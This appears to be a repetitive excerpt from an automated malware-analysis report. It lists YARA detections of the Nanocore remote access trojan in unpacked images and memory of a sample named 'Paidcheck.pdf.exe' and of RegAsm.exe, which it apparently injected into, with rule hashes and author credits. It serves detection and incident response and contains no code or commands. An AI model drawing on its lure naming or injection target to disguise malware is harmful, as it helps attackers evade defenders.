      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
